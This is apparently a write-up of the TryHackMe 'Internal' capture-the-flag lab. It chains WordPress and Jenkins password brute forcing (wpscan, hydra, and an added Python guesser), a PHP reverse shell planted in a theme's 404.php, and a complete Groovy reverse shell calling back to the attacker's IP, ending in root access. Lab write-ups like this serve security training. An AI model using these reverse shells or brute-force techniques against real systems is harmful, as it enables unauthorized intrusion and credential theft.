wd-tryhackme-internal

internal

scan

➜  tmp rustscan -a 10.10.103.231
Open 10.10.103.231:53
Open 10.10.103.231:22
Open 10.10.103.231:80

➜ tmp nmap -p 80 10.10.103.231 -sV
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

➜ tmp gobuster dir -u http://10.10.103.231/ -w /usr/share/dirb/wordlists/big.txt
...
/blog (Status: 301) [Size: 313] [--> http://10.10.103.231/blog/]
/javascript (Status: 301) [Size: 319] [--> http://10.10.103.231/javascript/]
/phpmyadmin (Status: 301) [Size: 319] [--> http://10.10.103.231/phpmyadmin/]
/wordpress (Status: 301) [Size: 318] [--> http://10.10.103.231/wordpress/]


➜ tmp gobuster dir -u http://internal.thm/blog/ -w /usr/share/dirb/wordlists/big.txt
/wp-admin (Status: 301) [Size: 320] [--> http://internal.thm/blog/wp-admin/]
/wp-content (Status: 301) [Size: 322] [--> http://internal.thm/blog/wp-content/]
/wp-includes (Status: 301) [Size: 323] [--> http://internal.thm/blog/wp-includes/]

# I don't know why the Arch Linux wpscan package doesn't work
# it's easy to use Docker or gem install instead
➜ ~ sudo docker run -it --rm -v /usr/share/wordlists/passwords:/passwords wpscanteam/wpscan --url http://10.10.103.231/blog --usernames admin --passwords /passwords/rockyou.txt

# or

➜ ~ wpscan --url http://10.10.103.231/blog --usernames admin --passwords ctf/tool/dic/rockyou.txt

[!] Valid Combinations Found:
| Username: admin, Password: my2boys


find a user password

http://internal.thm/blog/index.php/2020/08/03/5/

Posted on August 3, 2020 by admin Private:

To-Do

Don’t forget to reset Will’s credentials. william:arnold147

# doesn't work: these credentials are not valid for SSH
➜ tmp ssh william@internal.thm
Warning: Permanently added 'internal.thm' (ED25519) to the list of known hosts.
william@internal.thm's password:
Permission denied, please try again.

php reverse shell

# add Pentestmonkey's reverse shell to 404.php
http://internal.thm/blog/wp-admin/theme-editor.php?file=404.php&theme=twentyseventeen

➜ ~ nc -lvnp 5555
# request a non-existent page on the blog to trigger 404.php
$ whoami
www-data

$ ls *
...
opt:
containerd
wp-save.txt

tmp:
coffee-MOfmAD.tmp
espresso-vRoAgt.tmp
sandwich-m1F8Xe.tmp


# finds nothing: -name is case-sensitive (the flag file is actually user.txt), use -iname to match regardless of case
find / -type f -iname 'user.txt' 2>/dev/null

$ sudo -l
sudo: no tty present and no askpass program specified

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@internal:/$


www-data@internal:/$ sudo -l
sudo -l
[sudo] password for www-data:

# try William's password
william:arnold147
[sudo] password for www-data: arnold147

Sorry, try again

# remember the file in opt
www-data@internal:/$ cat /opt/wp*
Bill,

Aubreanna needed these credentials for something later. Let her know you have them and where they are.

aubreanna:bubb13guM!@#123
# switch to aubreanna now
# linpeas.sh is another way to find this file

➜ ~ ssh aubreanna@internal.thm

aubreanna@internal:~$ whoami
aubreanna

aubreanna@internal:~$ cat user.txt
# flag1 here
# I spent nearly two hours finding this flag XD

aubreanna@internal:~$ sudo -l
[sudo] password for aubreanna:
Sorry, user aubreanna may not run sudo on internal.

aubreanna@internal:~$ cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080


aubreanna@internal:~$ curl 172.17.0.2:8080
<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2F'/><script>window.location.replace('/login?from=%2F');</script></head><body style='background-color:white; color:white;'>


Authentication required
<!--
You are authenticated as: anonymous
Groups that you are in:

Permission you need to have (but didn't): hudson.model.Hudson.Read
... which is implied by: hudson.security.Permission.GenericRead
... which is implied by: hudson.model.Hudson.Administer
-->

</body></html>

port forward

➜  ~ ssh -L 9999:172.17.0.2:8080 aubreanna@internal.thm

# in the browser, the forwarded Jenkins service shows a login page
http://localhost:9999/

# william:arnold147 still doesn't work here
william:arnold147

# slow, but -t cannot go higher: hydra only allows 1 to 64 tasks
➜ dic hydra 127.0.0.1 -s 9999 -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:F=loginError" -l admin -P /home/arch/ctf/tool/dic/rockyou.txt -t 64

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-16 02:09:03
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344398 login tries (l:1/p:14344398), ~224132 tries per task
[DATA] attacking http-post-form://127.0.0.1:9999/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:F=loginError
[STATUS] 599.00 tries/min, 599 tries in 00:01h, 14343799 to do in 399:07h, 64 active
[STATUS] 580.33 tries/min, 1741 tries in 00:03h, 14342657 to do in 411:55h, 64 active
[9999][http-post-form] host: 127.0.0.1 login: admin password: spongebob
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-16 02:14:16
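The hydra line above relies on one detail: Jenkins answers a bad login with a 302 to /loginError, and hydra's F= condition scans the status line and headers as well as the body, so the redirect target alone marks a miss. The same failure-marker approach works for the WordPress login form wpscan hit earlier. Below is an added example (not code from the original writeup) that implements that check in Python against a constructed stand-in login endpoint started in-process, so it runs offline; FAKE_USERS, the stand-in server and the mini wordlist are assumptions, not the real Jenkins or rockyou.txt.

```python
"""Added example: a minimal HTTP POST-form password guesser in the style of
`hydra http-post-form ...:F=loginError`, driven against a constructed
stand-in for Jenkins' /j_acegi_security_check (not the real Jenkins)."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode

# Constructed stand-in credentials for the fake server below.
FAKE_USERS = {"admin": "spongebob"}


class FakeJenkinsLogin(BaseHTTPRequestHandler):
    """Mimics Jenkins' form login: 302 to /loginError on a miss, 302 to `from` on a hit."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        user = form.get("j_username", [""])[0]
        password = form.get("j_password", [""])[0]
        self.send_response(302)
        if self.path == "/j_acegi_security_check" and FAKE_USERS.get(user) == password:
            self.send_header("Location", form.get("from", ["/"])[0])
        else:
            self.send_header("Location", "/loginError")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the stand-in server quiet
        pass


def start_fake_server():
    """Bind an ephemeral localhost port and serve from a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), FakeJenkinsLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def attempt(host, port, username, password, failure_marker="loginError"):
    """One login attempt; True when the response carries no failure marker.

    Like hydra's F= check, the marker is searched in the status line and
    headers too, so the redirect to /loginError is caught without following it.
    """
    body = urlencode({"j_username": username, "j_password": password,
                      "from": "/", "Submit": "Sign in"})
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("POST", "/j_acegi_security_check", body=body,
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        resp = conn.getresponse()
        blob = (f"{resp.status} {resp.reason}\n"
                + "\n".join(f"{k}: {v}" for k, v in resp.getheaders())
                + "\n" + resp.read().decode(errors="replace"))
        return failure_marker not in blob
    finally:
        conn.close()


def brute_force(host, port, username, wordlist, failure_marker="loginError"):
    """Try each candidate in order; return the first accepted password or None."""
    for candidate in wordlist:
        if attempt(host, port, username, candidate, failure_marker):
            return candidate
    return None


if __name__ == "__main__":
    srv = start_fake_server()
    # Constructed mini wordlist standing in for rockyou.txt.
    words = ["123456", "password", "my2boys", "spongebob", "letmein"]
    print(brute_force("127.0.0.1", srv.server_port, "admin", words))
    srv.shutdown()
```

Against a real target the stand-in server goes away and host/port point at the forwarded Jenkins (127.0.0.1:9999 in the writeup); the marker check is unchanged, and the single-threaded loop is why hydra's -t matters for a 14-million-line wordlist.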


# log in, open Manage Jenkins -> Script Console and run this Groovy reverse shell (10.2.30.143 is the attacker's VPN IP)
# String host="10.2.30.143";int port=5557;String cmd="bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

➜ dic nc -lvnp 5557
Connection from 10.10.103.231:33994
whoami
jenkins

ls *
opt:
note.txt

cat /opt/note.txt
Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
need access to the root user account.

root:tr0ub13guM!@#123
➜ ~ ssh root@internal.thm

root@internal:~# ls
root.txt snap
root@internal:~# cat root.txt
# flag2 here

The hard level is really hard.